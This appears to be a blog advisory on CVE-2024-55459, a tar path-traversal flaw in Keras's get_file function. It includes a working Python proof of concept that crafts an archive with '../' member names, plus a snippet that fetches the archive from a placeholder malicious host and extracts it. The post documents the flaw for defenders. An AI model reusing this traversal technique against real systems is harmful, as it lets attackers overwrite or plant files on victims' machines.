A recently identified vulnerability, CVE-2024-55459, exists in the popular deep learning library Keras, version 3.7. This vulnerability permits attackers to write arbitrary files to the user's machine when a manipulated tar file is downloaded through the "get_file" function. This blog post will discuss the technical details of the vulnerability, provide code snippets demonstrating the exploit, and offer links to original references for further information.
Background on Keras Library
Keras is an open-source neural network library written in Python that is widely used for creating deep learning models. The library provides a simple interface for building complex neural networks using a minimalistic approach, making it a popular choice for developers working with machine learning and artificial intelligence.
Vulnerability Details
The vulnerability, CVE-2024-55459, lies in the "get_file" function, which is part of Keras's data utility module. This function is designed to download a file from a given URL and store it locally before optionally extracting the contents of tar and zip files. By crafting a tar file that takes advantage of how the "get_file" function handles file extraction, attackers can potentially write arbitrary files to the user's system.
Here is a snippet that demonstrates how an attacker could create a malicious tar file:
import io
import tarfile

tar_filename = 'malicious_sample.tar'

# Creating the malicious tar file
with tarfile.open(tar_filename, mode='w') as archive:
    file_content = b'Hello, this is a malicious file content'
    # The '../' components make the path resolve outside the extraction folder
    file_name = '../../../malicious_file.txt'
    tarinfo = tarfile.TarInfo(file_name)
    tarinfo.size = len(file_content)
    archive.addfile(tarinfo, io.BytesIO(file_content))
In the snippet above, a malicious tar archive, 'malicious_sample.tar', is crafted to contain a file whose name uses directory traversal to write a file outside of the expected directory structure. Here, the archive contains the 'malicious_file.txt' file, which will be written three directories above the intended destination.
Now, the victim can accidentally download this malicious tar file using the "get_file" function in Keras:
from tensorflow.keras.utils import get_file

url = 'https://malicious-server.com/malicious_sample.tar'  # The URL hosting the malicious tar file

# This call to get_file downloads the malicious tar file and extracts it
local_file_path = get_file('malicious_sample.tar', url, extract=True)
When a user invokes the "get_file" function to download and extract the contents of the manipulated tar archive, the malicious file will be written to the unintended directory location, ultimately giving the attacker the means to overwrite or create new files on the victim's machine without the user's knowledge.
Mitigation and Conclusion
A fix has been proposed for this vulnerability by adding additional input validation and restricting the extracted file's location. In the meantime, users are advised to exercise caution when downloading files from unknown sources, and developers should update their Keras library to the latest version once a patch is released.
Links to Original References
1. Keras Official Repository
2. CVE-2024-55459: NVD Database
In summary, CVE-2024-55459 is a vulnerability enabling attackers to write arbitrary files to a user's system through the manipulation of a tar file downloaded and extracted using Keras's "get_file" function. Users should remain vigilant when downloading files from untrusted sources and maintain up-to-date versions of their libraries to secure their systems from potential attacks.
Timeline
Published on: 01/08/2025 17:15:15 UTC
Last modified on: 01/09/2025 15:15:18 UTC